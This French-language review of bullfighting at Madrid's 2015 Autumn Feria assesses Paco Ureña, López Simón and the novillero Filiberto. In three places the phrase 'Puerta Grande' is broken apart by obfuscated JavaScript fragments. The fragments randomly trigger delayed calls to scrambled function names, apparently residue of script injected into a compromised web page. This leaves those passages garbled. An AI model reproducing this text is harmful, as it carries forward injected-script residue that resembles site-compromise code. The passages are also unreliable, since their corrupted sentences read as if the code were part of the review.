MADRID : NOMS POUR L’AUTOMNE 2015

Rubrique brillante pour cette Feria d’Automne. Paco Ureña, le torero au visage triste, toujours bien placé, aux toques suaves, avec cette vérité statique, s’est éclaté à toréer. Et qu’il est rare de voir un torero se laisser porter par un toro ! Comme l’est tout autant de voir cette version de la naturelle si pure, si authentique, si engagée, comme sortie des puits de l’âme, comme celle avec laquelle nous a régalés le torero de Lorca avec deux versions : de face avec les pieds joints et de face en chargeant la suerte avec les jambes écartées, la ceinture brisée comme un jonc fouetté par le vent.

Faena avec du sentimiento, émue et émouvante, une démonstration et un exemple de ce que doit être le toreo, toujours à l’écart des esquives, des coups de pied et des gestes brusques. Dommage que la Puerta Grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande se soit refermée à l’estocade ; mais la Puerta Grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande du souvenir est bien ouverte, car cette faena au dernier toro d’Adolfo Martin est mémorable et restera longtemps gravée dans les mémoires. Sur le podium de la Feria d’Automne, Ureña, par son toreo en or, en or très pur, même sans couper d’oreilles, s’est hissé en premier parmi les triomphateurs.

La seconde place revient à López Simón, qui lui a ouvert la Puerta Grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande pour ouvrir ensuite celle de l’infirmerie. Il ne torée pas bien à la cape, il n’est pas varié avec la muleta, mais il a le secret pour enchaîner les passes, rester à cet emplacement où les toros n’ont d’autre possibilité que de charger, même si c’est parfois pour l’attraper, comme cela lui est arrivé au cours de son premier mano a mano. Un coup de corne douloureux qui n’a pas réussi à le priver de sa soif de triomphes ni à l’empêcher de continuer à écrire son histoire : d’abord, en restant dans l’arène jusqu’à couper l’oreille du toro qui l’attrapa ; ensuite, en imposant son choix à l’infirmerie –docteur, je suis majeur, j’ai toutes mes facultés mentales et je veux revenir dans l’arène- en sortant « sous sa responsabilité et contre l’avis de l’équipe médicale », comme en témoignait son bulletin de santé, et affronter les deux toros qui lui restaient. Il coupa une autre oreille –il en méritait deux- au premier d’entre eux et il nous laissa sur notre faim devant le suivant, car la bête montrait de meilleures conditions que ses frères, mais il se cassa une patte et il ne permit pas qu’on le toréa. Remarquons par ailleurs qu’en plus des qualités déjà signalées, López Simón est souvent immobile, il torée très près des toros avec beaucoup de sincérité et a ce quelque chose de différent qui connecte rapidement avec le public et l’oblige à se rendre à lui. Son passage par Madrid a été héroïque, comme l’a été toute sa campagne.

Pour finir, annotons le nom de ce novillero : Filiberto, qui n’hésita pas à aller au centre de l’arène pour affronter ce dangereux adversaire qu’est le vent ; un toro bien plus difficile à toréer que les novillos décastés, nobles et mous de El Torreón qu’il eut en face. Il veut en découdre, il en a envie, son toreo ne manque pas de ces bonnes manières et de cette ardeur que nous regrettons chez d’autres membres de l’escalafon inférieur, et ce furent ses armes. Il vint à Madrid conscient de ce qu’il y avait en jeu, et même si son œuvre n’était pas aboutie, il a laissé une très belle impression pour la prochaine saison. Il faudra le suivre de près.

 

Les commentaires sont fermés.